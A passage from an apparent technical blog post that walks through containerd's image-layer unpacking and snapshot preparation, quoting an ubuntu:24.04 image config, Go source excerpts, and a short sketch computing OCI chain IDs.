    </span><span class="nl">"OpenStdin"</span><span class="p">:</span><span class="w"> </span><span class="kc">false</span><span class="p">,</span><span class="w">
    </span><span class="nl">"StdinOnce"</span><span class="p">:</span><span class="w"> </span><span class="kc">false</span><span class="p">,</span><span class="w">
    </span><span class="nl">"Env"</span><span class="p">:</span><span class="w"> </span><span class="p">[</span><span class="w">
      </span><span class="s2">"PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin"</span><span class="w">
    </span><span class="p">],</span><span class="w">
    </span><span class="nl">"Cmd"</span><span class="p">:</span><span class="w"> </span><span class="p">[</span><span class="w">
      </span><span class="s2">"/bin/bash"</span><span class="w">
    </span><span class="p">],</span><span class="w">
    </span><span class="nl">"Image"</span><span class="p">:</span><span class="w"> </span><span class="s2">"sha256:337382923f7584f260a9a67e7625aaf9d42c24784c6e92731c29fa3912ae5c47"</span><span class="p">,</span><span class="w">
    </span><span class="nl">"Volumes"</span><span class="p">:</span><span class="w"> </span><span class="kc">null</span><span class="p">,</span><span class="w">
    </span><span class="nl">"WorkingDir"</span><span class="p">:</span><span class="w"> </span><span class="s2">""</span><span class="p">,</span><span class="w">
    </span><span class="nl">"Entrypoint"</span><span class="p">:</span><span class="w"> </span><span class="kc">null</span><span class="p">,</span><span class="w">
    </span><span class="nl">"OnBuild"</span><span class="p">:</span><span class="w"> </span><span class="kc">null</span><span class="p">,</span><span class="w">
    </span><span class="nl">"Labels"</span><span class="p">:</span><span class="w"> </span><span class="p">{</span><span class="w">
      </span><span class="nl">"org.opencontainers.image.version"</span><span class="p">:</span><span class="w"> </span><span class="s2">"24.04"</span><span class="w">
    </span><span class="p">}</span><span class="w">
  </span><span class="p">},</span><span class="w">
  </span><span class="nl">"container"</span><span class="p">:</span><span class="w"> </span><span class="s2">"824f27add47a9b8b83f4296fcbd9772627dd3ab13c39c889306a30cd4e2e1fc1"</span><span class="p">,</span><span class="w">
  </span><span class="nl">"container_config"</span><span class="p">:</span><span class="w"> </span><span class="p">{</span><span class="w">
    </span><span class="nl">"Hostname"</span><span class="p">:</span><span class="w"> </span><span class="s2">"824f27add47a"</span><span class="p">,</span><span class="w">
    </span><span class="nl">"Domainname"</span><span class="p">:</span><span class="w"> </span><span class="s2">""</span><span class="p">,</span><span class="w">
    </span><span class="nl">"User"</span><span class="p">:</span><span class="w"> </span><span class="s2">""</span><span class="p">,</span><span class="w">
    </span><span class="nl">"AttachStdin"</span><span class="p">:</span><span class="w"> </span><span class="kc">false</span><span class="p">,</span><span class="w">
    </span><span class="nl">"AttachStdout"</span><span class="p">:</span><span class="w"> </span><span class="kc">false</span><span class="p">,</span><span class="w">
    </span><span class="nl">"AttachStderr"</span><span class="p">:</span><span class="w"> </span><span class="kc">false</span><span class="p">,</span><span class="w">
    </span><span class="nl">"Tty"</span><span class="p">:</span><span class="w"> </span><span class="kc">false</span><span class="p">,</span><span class="w">
    </span><span class="nl">"OpenStdin"</span><span class="p">:</span><span class="w"> </span><span class="kc">false</span><span class="p">,</span><span class="w">
    </span><span class="nl">"StdinOnce"</span><span class="p">:</span><span class="w"> </span><span class="kc">false</span><span class="p">,</span><span class="w">
    </span><span class="nl">"Env"</span><span class="p">:</span><span class="w"> </span><span class="p">[</span><span class="w">
      </span><span class="s2">"PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin"</span><span class="w">
    </span><span class="p">],</span><span class="w">
    </span><span class="nl">"Cmd"</span><span class="p">:</span><span class="w"> </span><span class="p">[</span><span class="w">
      </span><span class="s2">"/bin/sh"</span><span class="p">,</span><span class="w">
      </span><span class="s2">"-c"</span><span class="p">,</span><span class="w">
      </span><span class="s2">"#(nop) "</span><span class="p">,</span><span class="w">
      </span><span class="s2">"CMD [</span><span class="se">\"</span><span class="s2">/bin/bash</span><span class="se">\"</span><span class="s2">]"</span><span class="w">
    </span><span class="p">],</span><span class="w">
    </span><span class="nl">"Image"</span><span class="p">:</span><span class="w"> </span><span class="s2">"sha256:337382923f7584f260a9a67e7625aaf9d42c24784c6e92731c29fa3912ae5c47"</span><span class="p">,</span><span class="w">
    </span><span class="nl">"Volumes"</span><span class="p">:</span><span class="w"> </span><span class="kc">null</span><span class="p">,</span><span class="w">
    </span><span class="nl">"WorkingDir"</span><span class="p">:</span><span class="w"> </span><span class="s2">""</span><span class="p">,</span><span class="w">
    </span><span class="nl">"Entrypoint"</span><span class="p">:</span><span class="w"> </span><span class="kc">null</span><span class="p">,</span><span class="w">
    </span><span class="nl">"OnBuild"</span><span class="p">:</span><span class="w"> </span><span class="kc">null</span><span class="p">,</span><span class="w">
    </span><span class="nl">"Labels"</span><span class="p">:</span><span class="w"> </span><span class="p">{</span><span class="w">
      </span><span class="nl">"org.opencontainers.image.version"</span><span class="p">:</span><span class="w"> </span><span class="s2">"24.04"</span><span class="w">
    </span><span class="p">}</span><span class="w">
  </span><span class="p">},</span><span class="w">
  </span><span class="nl">"created"</span><span class="p">:</span><span class="w"> </span><span class="s2">"2026-04-10T06:49:18.133477895Z"</span><span class="p">,</span><span class="w">
  </span><span class="nl">"docker_version"</span><span class="p">:</span><span class="w"> </span><span class="s2">"26.1.3"</span><span class="p">,</span><span class="w">
  </span><span class="nl">"history"</span><span class="p">:</span><span class="w"> </span><span class="p">[</span><span class="w">
    </span><span class="p">{</span><span class="w">
      </span><span class="nl">"created"</span><span class="p">:</span><span class="w"> </span><span class="s2">"2026-04-10T06:49:15.45210454Z"</span><span class="p">,</span><span class="w">
      </span><span class="nl">"created_by"</span><span class="p">:</span><span class="w"> </span><span class="s2">"/bin/sh -c #(nop)  ARG RELEASE"</span><span class="p">,</span><span class="w">
      </span><span class="nl">"empty_layer"</span><span class="p">:</span><span class="w"> </span><span class="kc">true</span><span class="w">
    </span><span class="p">},</span><span class="w">
    </span><span class="p">{</span><span class="w">
      </span><span class="nl">"created"</span><span class="p">:</span><span class="w"> </span><span class="s2">"2026-04-10T06:49:15.493474875Z"</span><span class="p">,</span><span class="w">
      </span><span class="nl">"created_by"</span><span class="p">:</span><span class="w"> </span><span class="s2">"/bin/sh -c #(nop)  ARG LAUNCHPAD_BUILD_ARCH"</span><span class="p">,</span><span class="w">
      </span><span class="nl">"empty_layer"</span><span class="p">:</span><span class="w"> </span><span class="kc">true</span><span class="w">
    </span><span class="p">},</span><span class="w">
    </span><span class="p">{</span><span class="w">
      </span><span class="nl">"created"</span><span class="p">:</span><span class="w"> </span><span class="s2">"2026-04-10T06:49:15.521658623Z"</span><span class="p">,</span><span class="w">
      </span><span class="nl">"created_by"</span><span class="p">:</span><span class="w"> </span><span class="s2">"/bin/sh -c #(nop)  LABEL org.opencontainers.image.version=24.04"</span><span class="p">,</span><span class="w">
      </span><span class="nl">"empty_layer"</span><span class="p">:</span><span class="w"> </span><span class="kc">true</span><span class="w">
    </span><span class="p">},</span><span class="w">
    </span><span class="p">{</span><span class="w">
      </span><span class="nl">"created"</span><span class="p">:</span><span class="w"> </span><span class="s2">"2026-04-10T06:49:17.706887224Z"</span><span class="p">,</span><span class="w">
      </span><span class="nl">"created_by"</span><span class="p">:</span><span class="w"> </span><span class="s2">"/bin/sh -c #(nop) ADD file:8ce1caf246e7c778bca84c516d02fd4e83766bb2c530a0fffa8a351b560a2728 in / "</span><span class="w">
    </span><span class="p">},</span><span class="w">
    </span><span class="p">{</span><span class="w">
      </span><span class="nl">"created"</span><span class="p">:</span><span class="w"> </span><span class="s2">"2026-04-10T06:49:18.133477895Z"</span><span class="p">,</span><span class="w">
      </span><span class="nl">"created_by"</span><span class="p">:</span><span class="w"> </span><span class="s2">"/bin/sh -c #(nop)  CMD [</span><span class="se">\"</span><span class="s2">/bin/bash</span><span class="se">\"</span><span class="s2">]"</span><span class="p">,</span><span class="w">
      </span><span class="nl">"empty_layer"</span><span class="p">:</span><span class="w"> </span><span class="kc">true</span><span class="w">
    </span><span class="p">}</span><span class="w">
  </span><span class="p">],</span><span class="w">
  </span><span class="nl">"os"</span><span class="p">:</span><span class="w"> </span><span class="s2">"linux"</span><span class="p">,</span><span class="w">
  </span><span class="nl">"rootfs"</span><span class="p">:</span><span class="w"> </span><span class="p">{</span><span class="w">
    </span><span class="nl">"type"</span><span class="p">:</span><span class="w"> </span><span class="s2">"layers"</span><span class="p">,</span><span class="w">
    </span><span class="nl">"diff_ids"</span><span class="p">:</span><span class="w"> </span><span class="p">[</span><span class="w">
      </span><span class="s2">"sha256:538812a4b9bd45adaac2b5e5b967daa6999aa44eb110aa32ae7c69702b906475"</span><span class="w">
    </span><span class="p">]</span><span class="w">
  </span><span class="p">}</span><span class="w">
</span><span class="p">}</span><span class="w">
</span></code></pre></div></div>

<p><code class="language-plaintext highlighter-rouge">fetch()</code> calls <code class="language-plaintext highlighter-rouge">h.Handle(ctx2, desc)</code> for each layer’s descriptor [11], which invokes the chained handlers, including the download handler, <strong><code class="language-plaintext highlighter-rouge">.FetchHandler()</code></strong>.</p>

<div class="language-go highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c">// vendor/github.com/containerd/containerd/v2/core/unpack/unpacker.go</span>
<span class="k">func</span> <span class="p">(</span><span class="n">u</span> <span class="o">*</span><span class="n">Unpacker</span><span class="p">)</span> <span class="n">fetch</span><span class="p">(</span><span class="n">ctx</span> <span class="n">context</span><span class="o">.</span><span class="n">Context</span><span class="p">,</span> <span class="n">h</span> <span class="n">images</span><span class="o">.</span><span class="n">Handler</span><span class="p">,</span> <span class="n">layers</span> <span class="p">[]</span><span class="n">ocispec</span><span class="o">.</span><span class="n">Descriptor</span><span class="p">,</span> <span class="n">done</span> <span class="p">[]</span><span class="k">chan</span> <span class="k">struct</span><span class="p">{})</span> <span class="kt">error</span> <span class="p">{</span>
    <span class="n">eg</span><span class="o">.</span><span class="n">Go</span><span class="p">(</span><span class="k">func</span><span class="p">()</span> <span class="kt">error</span> <span class="p">{</span>
        <span class="k">for</span> <span class="n">i</span><span class="p">,</span> <span class="n">desc</span> <span class="o">:=</span> <span class="k">range</span> <span class="n">layers</span> <span class="p">{</span>
            <span class="c">// [...]</span>
            <span class="n">_</span><span class="p">,</span> <span class="n">err</span> <span class="o">=</span> <span class="n">h</span><span class="o">.</span><span class="n">Handle</span><span class="p">(</span><span class="n">ctx2</span><span class="p">,</span> <span class="n">desc</span><span class="p">)</span> <span class="c">// [11]</span>
            <span class="c">// [...]</span>
        <span class="p">}</span>
    <span class="p">})</span>
<span class="p">}</span>
</code></pre></div></div>

<p><code class="language-plaintext highlighter-rouge">Apply()</code> <strong>sends an apply request to <code class="language-plaintext highlighter-rouge">containerd</code></strong> [12] with the layer descriptor.</p>

<div class="language-go highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c">// vendor/github.com/containerd/containerd/v2/core/diff/proxy/differ.go</span>
<span class="k">func</span> <span class="p">(</span><span class="n">r</span> <span class="o">*</span><span class="n">diffRemote</span><span class="p">)</span> <span class="n">Apply</span><span class="p">(</span><span class="n">ctx</span> <span class="n">context</span><span class="o">.</span><span class="n">Context</span><span class="p">,</span> <span class="n">desc</span> <span class="n">ocispec</span><span class="o">.</span><span class="n">Descriptor</span><span class="p">,</span> <span class="n">mounts</span> <span class="p">[]</span><span class="n">mount</span><span class="o">.</span><span class="n">Mount</span><span class="p">,</span> <span class="n">opts</span> <span class="o">...</span><span class="n">diff</span><span class="o">.</span><span class="n">ApplyOpt</span><span class="p">)</span> <span class="p">(</span><span class="n">ocispec</span><span class="o">.</span><span class="n">Descriptor</span><span class="p">,</span> <span class="kt">error</span><span class="p">)</span> <span class="p">{</span>
    <span class="c">// [...]</span>
    <span class="n">req</span> <span class="o">:=</span> <span class="o">&amp;</span><span class="n">diffapi</span><span class="o">.</span><span class="n">ApplyRequest</span><span class="p">{</span>
        <span class="n">Diff</span><span class="o">:</span>     <span class="n">oci</span><span class="o">.</span><span class="n">DescriptorToProto</span><span class="p">(</span><span class="n">desc</span><span class="p">),</span>
        <span class="n">Mounts</span><span class="o">:</span>   <span class="n">mount</span><span class="o">.</span><span class="n">ToProto</span><span class="p">(</span><span class="n">mounts</span><span class="p">),</span>
        <span class="n">Payloads</span><span class="o">:</span> <span class="n">payloads</span><span class="p">,</span>
        <span class="n">SyncFs</span><span class="o">:</span>   <span class="n">config</span><span class="o">.</span><span class="n">SyncFs</span><span class="p">,</span>
    <span class="p">}</span>
    <span class="c">// [...]</span>
    <span class="n">resp</span><span class="p">,</span> <span class="n">err</span> <span class="o">:=</span> <span class="n">r</span><span class="o">.</span><span class="n">client</span><span class="o">.</span><span class="n">Apply</span><span class="p">(</span><span class="n">ctx</span><span class="p">,</span> <span class="n">req</span><span class="p">)</span> <span class="c">// &lt;--------</span>
    <span class="c">// [...]</span>
<span class="p">}</span>

<span class="c">// vendor/github.com/containerd/containerd/api/services/diff/v1/diff_grpc.pb.go</span>
<span class="k">func</span> <span class="p">(</span><span class="n">c</span> <span class="o">*</span><span class="n">diffClient</span><span class="p">)</span> <span class="n">Apply</span><span class="p">(</span><span class="n">ctx</span> <span class="n">context</span><span class="o">.</span><span class="n">Context</span><span class="p">,</span> <span class="n">in</span> <span class="o">*</span><span class="n">ApplyRequest</span><span class="p">,</span> <span class="n">opts</span> <span class="o">...</span><span class="n">grpc</span><span class="o">.</span><span class="n">CallOption</span><span class="p">)</span> <span class="p">(</span><span class="o">*</span><span class="n">ApplyResponse</span><span class="p">,</span> <span class="kt">error</span><span class="p">)</span> <span class="p">{</span>
    <span class="n">out</span> <span class="o">:=</span> <span class="nb">new</span><span class="p">(</span><span class="n">ApplyResponse</span><span class="p">)</span>
    <span class="n">err</span> <span class="o">:=</span> <span class="n">c</span><span class="o">.</span><span class="n">cc</span><span class="o">.</span><span class="n">Invoke</span><span class="p">(</span><span class="n">ctx</span><span class="p">,</span> <span class="s">"/containerd.services.diff.v1.Diff/Apply"</span><span class="p">,</span> <span class="n">in</span><span class="p">,</span> <span class="n">out</span><span class="p">,</span> <span class="n">opts</span><span class="o">...</span><span class="p">)</span> <span class="c">// [12]</span>
    <span class="c">// [...]</span>
<span class="p">}</span>
</code></pre></div></div>

<p>By now we know that the <strong>unpack operations are performed by <code class="language-plaintext highlighter-rouge">containerd</code></strong>, not <code class="language-plaintext highlighter-rouge">dockerd</code>.</p>

<h3 id="22-create-a-snapshot">2.2. Create a Snapshot</h3>

<p>Before delving into the unpacking implementation of <code class="language-plaintext highlighter-rouge">containerd</code>, let’s take a look at the snapshot mechanism.</p>

<p>A snapshot is a saved state of <strong>a filesystem layer</strong>, and it also defines how that layer and its parents are mounted.</p>

<p>In <code class="language-plaintext highlighter-rouge">unpack()</code>, <code class="language-plaintext highlighter-rouge">sn.Prepare()</code> is called to create a snapshot [1].</p>

<div class="language-go highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c">// vendor/github.com/containerd/containerd/v2/core/unpack/unpacker.go</span>
<span class="k">func</span> <span class="p">(</span><span class="n">u</span> <span class="o">*</span><span class="n">Unpacker</span><span class="p">)</span> <span class="n">unpack</span><span class="p">(</span>
    <span class="n">h</span> <span class="n">images</span><span class="o">.</span><span class="n">Handler</span><span class="p">,</span>
    <span class="n">config</span> <span class="n">ocispec</span><span class="o">.</span><span class="n">Descriptor</span><span class="p">,</span>
    <span class="n">layers</span> <span class="p">[]</span><span class="n">ocispec</span><span class="o">.</span><span class="n">Descriptor</span><span class="p">,</span>
<span class="p">)</span> <span class="kt">error</span> <span class="p">{</span>
    <span class="c">// [...]</span>
    <span class="n">topHalf</span> <span class="o">:=</span> <span class="k">func</span><span class="p">(</span><span class="n">i</span> <span class="kt">int</span><span class="p">,</span> <span class="n">desc</span> <span class="n">ocispec</span><span class="o">.</span><span class="n">Descriptor</span><span class="p">,</span> <span class="n">span</span> <span class="o">*</span><span class="n">tracing</span><span class="o">.</span><span class="n">Span</span><span class="p">,</span> <span class="n">startAt</span> <span class="n">time</span><span class="o">.</span><span class="n">Time</span><span class="p">)</span> <span class="p">(</span><span class="o">&lt;-</span><span class="k">chan</span> <span class="o">*</span><span class="n">unpackStatus</span><span class="p">,</span> <span class="kt">error</span><span class="p">)</span> <span class="p">{</span>
        <span class="c">// [...]</span>
        <span class="k">var</span> <span class="p">(</span>
            <span class="n">key</span>    <span class="kt">string</span>
            <span class="n">mounts</span> <span class="p">[]</span><span class="n">mount</span><span class="o">.</span><span class="n">Mount</span>
            <span class="n">opts</span>   <span class="o">=</span> <span class="nb">append</span><span class="p">(</span><span class="n">unpack</span><span class="o">.</span><span class="n">SnapshotOpts</span><span class="p">,</span> <span class="n">snapshots</span><span class="o">.</span><span class="n">WithLabels</span><span class="p">(</span><span class="n">snapshotLabels</span><span class="p">))</span>
        <span class="p">)</span>
        <span class="c">// [...]</span>
        <span class="n">key</span> <span class="o">=</span> <span class="n">fmt</span><span class="o">.</span><span class="n">Sprintf</span><span class="p">(</span><span class="n">snapshots</span><span class="o">.</span><span class="n">UnpackKeyFormat</span><span class="p">,</span> <span class="n">uniquePart</span><span class="p">(),</span> <span class="n">chainID</span><span class="p">)</span>
        <span class="n">mounts</span><span class="p">,</span> <span class="n">err</span> <span class="o">=</span> <span class="n">sn</span><span class="o">.</span><span class="n">Prepare</span><span class="p">(</span><span class="n">ctx</span><span class="p">,</span> <span class="n">key</span><span class="p">,</span> <span class="n">parent</span><span class="p">,</span> <span class="n">opts</span><span class="o">...</span><span class="p">)</span> <span class="c">// [1]</span>
        <span class="c">// [...]</span>
    <span class="p">}</span>
<span class="p">}</span>
</code></pre></div></div>
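
<p>The <code class="language-plaintext highlighter-rouge">chainID</code> that goes into the snapshot key identifies a layer together with everything below it. The sketch below derives chain IDs from <code class="language-plaintext highlighter-rouge">diff_ids</code> using the rule from the OCI image specification. The helpers <code class="language-plaintext highlighter-rouge">chainIDs()</code> and <code class="language-plaintext highlighter-rouge">unpackKey()</code> are hypothetical, the <code class="language-plaintext highlighter-rouge">"extract-%s %s"</code> format string is my assumption about the value of <code class="language-plaintext highlighter-rouge">snapshots.UnpackKeyFormat</code>, and the unique part is a made-up placeholder.</p>

```go
package main

import (
	"crypto/sha256"
	"fmt"
)

// chainIDs applies the OCI image spec rule to a list of diff IDs:
//
//	ChainID(L0)      = DiffID(L0)
//	ChainID(L0..Ln)  = SHA256(ChainID(L0..Ln-1) + " " + DiffID(Ln))
func chainIDs(diffIDs []string) []string {
	out := make([]string, len(diffIDs))
	for i, d := range diffIDs {
		if i == 0 {
			// The bottom layer's chain ID is its diff ID.
			out[i] = d
			continue
		}
		sum := sha256.Sum256([]byte(out[i-1] + " " + d))
		out[i] = fmt.Sprintf("sha256:%x", sum)
	}
	return out
}

// unpackKey imitates fmt.Sprintf(snapshots.UnpackKeyFormat, uniquePart(), chainID).
// The format string here is an assumption, not copied from the source above.
func unpackKey(unique, chainID string) string {
	return fmt.Sprintf("extract-%s %s", unique, chainID)
}

func main() {
	// diff_ids taken from the ubuntu:24.04 image config shown earlier.
	ids := chainIDs([]string{
		"sha256:538812a4b9bd45adaac2b5e5b967daa6999aa44eb110aa32ae7c69702b906475",
	})
	// "123456-abcd" is a placeholder for the value returned by uniquePart().
	fmt.Println(unpackKey("123456-abcd", ids[0]))
}
```

<p>Since the image above has a single entry in <code class="language-plaintext highlighter-rouge">diff_ids</code>, its only chain ID is that diff ID itself. Hashing only comes into play from the second layer onward.</p>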

<p>Snapshot preparation ends up sending a <code class="language-plaintext highlighter-rouge">PrepareSnapshotRequest</code> [2] to <code class="language-plaintext highlighter-rouge">containerd</code>.</p>

<div class="language-go highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c">// vendor/github.com/containerd/containerd/v2/core/snapshots/proxy/proxy.go</span>
<span class="k">func</span> <span class="p">(</span><span class="n">p</span> <span class="o">*</span><span class="n">proxySnapshotter</span><span class="p">)</span> <span class="n">Prepare</span><span class="p">(</span><span class="n">ctx</span> <span class="n">context</span><span class="o">.</span><span class="n">Context</span><span class="p">,</span> <span class="n">key</span><span class="p">,</span> <span class="n">parent</span> <span class="kt">string</span><span class="p">,</span> <span class="n">opts</span> <span class="o">...</span><span class="n">snapshots</span><span class="o">.</span><span class="n">Opt</span><span class="p">)</span> <span class="p">([]</span><span class="n">mount</span><span class="o">.</span><span class="n">Mount</span><span class="p">,</span> <span class="kt">error</span><span class="p">)</span> <span class="p">{</span>
    <span class="c">// [...]</span>
    <span class="n">resp</span><span class="p">,</span> <span class="n">err</span> <span class="o">:=</span> <span class="n">p</span><span class="o">.</span><span class="n">client</span><span class="o">.</span><span class="n">Prepare</span><span class="p">(</span><span class="n">ctx</span><span class="p">,</span> <span class="o">&amp;</span><span class="n">snapshotsapi</span><span class="o">.</span><span class="n">PrepareSnapshotRequest</span><span class="p">{</span> <span class="c">// [2]</span>
        <span class="n">Snapshotter</span><span class="o">:</span> <span class="n">p</span><span class="o">.</span><span class="n">snapshotterName</span><span class="p">,</span> <span class="c">// by default "overlayfs"</span>
        <span class="n">Key</span><span class="o">:</span>         <span class="n">key</span><span class="p">,</span>
        <span class="n">Parent</span><span class="o">:</span>      <span class="n">parent</span><span class="p">,</span>
        <span class="n">Labels</span><span class="o">:</span>      <span class="n">local</span><span class="o">.</span><span class="n">Labels</span><span class="p">,</span>
    <span class="p">})</span>
    <span class="c">// [...]</span>
    <span class="k">return</span> <span class="n">mount</span><span class="o">.</span><span class="n">FromProto</span><span class="p">(</span><span class="n">resp</span><span class="o">.</span><span class="n">Mounts</span><span class="p">),</span> <span class="no">nil</span>
<span class="p">}</span>
</code></pre></div></div>

<p><code class="language-plaintext highlighter-rouge">containerd</code>’s handler internally creates the snapshot-related files and directories [3], and then calls <code class="language-plaintext highlighter-rouge">o.mounts(s, info)</code> to generate the overlayfs mount options [4].</p>

<div class="language-go highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c">// plugins/services/snapshots/service.go</span>
<span class="c">// from _Snapshots_Prepare_Handler()</span>
<span class="k">func</span> <span class="p">(</span><span class="n">s</span> <span class="o">*</span><span class="n">service</span><span class="p">)</span> <span class="n">Prepare</span><span class="p">(</span><span class="n">ctx</span> <span class="n">context</span><span class="o">.</span><span class="n">Context</span><span class="p">,</span> <span class="n">pr</span> <span class="o">*</span><span class="n">snapshotsapi</span><span class="o">.</span><span class="n">PrepareSnapshotRequest</span><span class="p">)</span> <span class="p">(</span><span class="o">*</span><span class="n">snapshotsapi</span><span class="o">.</span><span class="n">PrepareSnapshotResponse</span><span class="p">,</span> <span class="kt">error</span><span class="p">)</span> <span class="p">{</span>
    <span class="c">// [...]</span>
    <span class="n">sn</span><span class="p">,</span> <span class="n">err</span> <span class="o">:=</span> <span class="n">s</span><span class="o">.</span><span class="n">getSnapshotter</span><span class="p">(</span><span class="n">pr</span><span class="o">.</span><span class="n">Snapshotter</span><span class="p">)</span> <span class="c">// "overlayfs"</span>
    <span class="c">// [...]</span>
    <span class="n">mounts</span><span class="p">,</span> <span class="n">err</span> <span class="o">:=</span> <span class="n">sn</span><span class="o">.</span><span class="n">Prepare</span><span class="p">(</span><span class="n">ctx</span><span class="p">,</span> <span class="n">pr</span><span class="o">.</span><span class="n">Key</span><span class="p">,</span> <span class="n">pr</span><span class="o">.</span><span class="n">Parent</span><span class="p">,</span> <span class="n">opts</span><span class="o">...</span><span class="p">)</span> <span class="c">// &lt;--------</span>
    <span class="c">// [...]</span>
    <span class="k">return</span> <span class="o">&amp;</span><span class="n">snapshotsapi</span><span class="o">.</span><span class="n">PrepareSnapshotResponse</span><span class="p">{</span>
        <span class="n">Mounts</span><span class="o">:</span> <span class="n">mount</span><span class="o">.</span><span class="n">ToProto</span><span class="p">(</span><span class="n">mounts</span><span class="p">),</span>
    <span class="p">},</span> <span class="no">nil</span>
<span class="p">}</span>

<span class="c">// core/metadata/snapshot.go</span>
<span class="k">func</span> <span class="p">(</span><span class="n">s</span> <span class="o">*</span><span class="n">snapshotter</span><span class="p">)</span> <span class="n">Prepare</span><span class="p">(</span><span class="n">ctx</span> <span class="n">context</span><span class="o">.</span><span class="n">Context</span><span class="p">,</span> <span class="n">key</span><span class="p">,</span> <span class="n">parent</span> <span class="kt">string</span><span class="p">,</span> <span class="n">opts</span> <span class="o">...</span><span class="n">snapshots</span><span class="o">.</span><span class="n">Opt</span><span class="p">)</span> <span class="p">([]</span><span class="n">mount</span><span class="o">.</span><span class="n">Mount</span><span class="p">,</span> <span class="kt">error</span><span class="p">)</span> <span class="p">{</span>
    <span class="n">mounts</span><span class="p">,</span> <span class="n">err</span> <span class="o">:=</span> <span class="n">s</span><span class="o">.</span><span class="n">createSnapshot</span><span class="p">(</span><span class="n">ctx</span><span class="p">,</span> <span class="n">key</span><span class="p">,</span> <span class="n">parent</span><span class="p">,</span> <span class="no">false</span><span class="p">,</span> <span class="n">opts</span><span class="p">)</span> <span class="c">// &lt;--------</span>
    <span class="c">// [...]</span>
    <span class="k">return</span> <span class="n">mounts</span><span class="p">,</span> <span class="no">nil</span>
<span class="p">}</span>

<span class="k">func</span> <span class="p">(</span><span class="n">s</span> <span class="o">*</span><span class="n">snapshotter</span><span class="p">)</span> <span class="n">createSnapshot</span><span class="p">(</span><span class="n">ctx</span> <span class="n">context</span><span class="o">.</span><span class="n">Context</span><span class="p">,</span> <span class="n">key</span><span class="p">,</span> <span class="n">parent</span> <span class="kt">string</span><span class="p">,</span> <span class="n">readonly</span> <span class="kt">bool</span><span class="p">,</span> <span class="n">opts</span> <span class="p">[]</span><span class="n">snapshots</span><span class="o">.</span><span class="n">Opt</span><span class="p">)</span> <span class="p">([]</span><span class="n">mount</span><span class="o">.</span><span class="n">Mount</span><span class="p">,</span> <span class="kt">error</span><span class="p">)</span> <span class="p">{</span>
    <span class="c">// [...]</span>
    <span class="n">m</span><span class="p">,</span> <span class="n">err</span> <span class="o">=</span> <span class="n">s</span><span class="o">.</span><span class="n">Snapshotter</span><span class="o">.</span><span class="n">Prepare</span><span class="p">(</span><span class="n">ctx</span><span class="p">,</span> <span class="n">bkey</span><span class="p">,</span> <span class="n">bparent</span><span class="p">,</span> <span class="n">bopts</span><span class="o">...</span><span class="p">)</span> <span class="c">// &lt;--------</span>
    <span class="c">// [...]</span>
<span class="p">}</span>

<span class="c">// plugins/snapshots/overlay/overlay.go</span>
<span class="k">func</span> <span class="p">(</span><span class="n">o</span> <span class="o">*</span><span class="n">snapshotter</span><span class="p">)</span> <span class="n">Prepare</span><span class="p">(</span><span class="n">ctx</span> <span class="n">context</span><span class="o">.</span><span class="n">Context</span><span class="p">,</span> <span class="n">key</span><span class="p">,</span> <span class="n">parent</span> <span class="kt">string</span><span class="p">,</span> <span class="n">opts</span> <span class="o">...</span><span class="n">snapshots</span><span class="o">.</span><span class="n">Opt</span><span class="p">)</span> <span class="p">([]</span><span class="n">mount</span><span class="o">.</span><span class="n">Mount</span><span class="p">,</span> <span class="kt">error</span><span class="p">)</span> <span class="p">{</span>
    <span class="k">return</span> <span class="n">o</span><span class="o">.</span><span class="n">createSnapshot</span><span class="p">(</span><span class="n">ctx</span><span class="p">,</span> <span class="n">snapshots</span><span class="o">.</span><span class="n">KindActive</span><span class="p">,</span> <span class="n">key</span><span class="p">,</span> <span class="n">parent</span><span class="p">,</span> <span class="n">opts</span><span class="p">)</span> <span class="c">// &lt;--------</span>
<span class="p">}</span>

<span class="c">// plugins/snapshots/overlay/overlay.go</span>
<span class="k">func</span> <span class="p">(</span><span class="n">o</span> <span class="o">*</span><span class="n">snapshotter</span><span class="p">)</span> <span class="n">createSnapshot</span><span class="p">(</span><span class="n">ctx</span> <span class="n">context</span><span class="o">.</span><span class="n">Context</span><span class="p">,</span> <span class="n">kind</span> <span class="n">snapshots</span><span class="o">.</span><span class="n">Kind</span><span class="p">,</span> <span class="n">key</span><span class="p">,</span> <span class="n">parent</span> <span class="kt">string</span><span class="p">,</span> <span class="n">opts</span> <span class="p">[]</span><span class="n">snapshots</span><span class="o">.</span><span class="n">Opt</span><span class="p">)</span> <span class="p">(</span><span class="n">_</span> <span class="p">[]</span><span class="n">mount</span><span class="o">.</span><span class="n">Mount</span><span class="p">,</span> <span class="n">err</span> <span class="kt">error</span><span class="p">)</span> <span class="p">{</span>
    <span class="c">// [...]</span>
    <span class="n">_</span><span class="p">,</span> <span class="n">info</span><span class="p">,</span> <span class="n">_</span><span class="p">,</span> <span class="n">err</span> <span class="o">=</span> <span class="n">storage</span><span class="o">.</span><span class="n">GetInfo</span><span class="p">(</span><span class="n">ctx</span><span class="p">,</span> <span class="n">key</span><span class="p">)</span>
    <span class="c">// [...]</span>
    <span class="n">snapshotDir</span> <span class="o">:=</span> <span class="n">filepath</span><span class="o">.</span><span class="n">Join</span><span class="p">(</span><span class="n">o</span><span class="o">.</span><span class="n">root</span><span class="p">,</span> <span class="s">"snapshots"</span><span class="p">)</span>
    <span class="n">td</span><span class="p">,</span> <span class="n">err</span> <span class="o">=</span> <span class="n">o</span><span class="o">.</span><span class="n">prepareDirectory</span><span class="p">(</span><span class="n">ctx</span><span class="p">,</span> <span class="n">snapshotDir</span><span class="p">,</span> <span class="n">kind</span><span class="p">)</span>
    <span class="c">// [...]</span>
    <span class="n">path</span> <span class="o">=</span> <span class="n">filepath</span><span class="o">.</span><span class="n">Join</span><span class="p">(</span><span class="n">snapshotDir</span><span class="p">,</span> <span class="n">s</span><span class="o">.</span><span class="n">ID</span><span class="p">)</span>
    <span class="k">if</span> <span class="n">err</span> <span class="o">=</span> <span class="n">os</span><span class="o">.</span><span class="n">Rename</span><span class="p">(</span><span class="n">td</span><span class="p">,</span> <span class="n">path</span><span class="p">);</span> <span class="n">err</span> <span class="o">!=</span> <span class="no">nil</span> <span class="p">{</span> <span class="c">// [3]</span>
        <span class="c">// [...]</span>
    <span class="p">}</span>
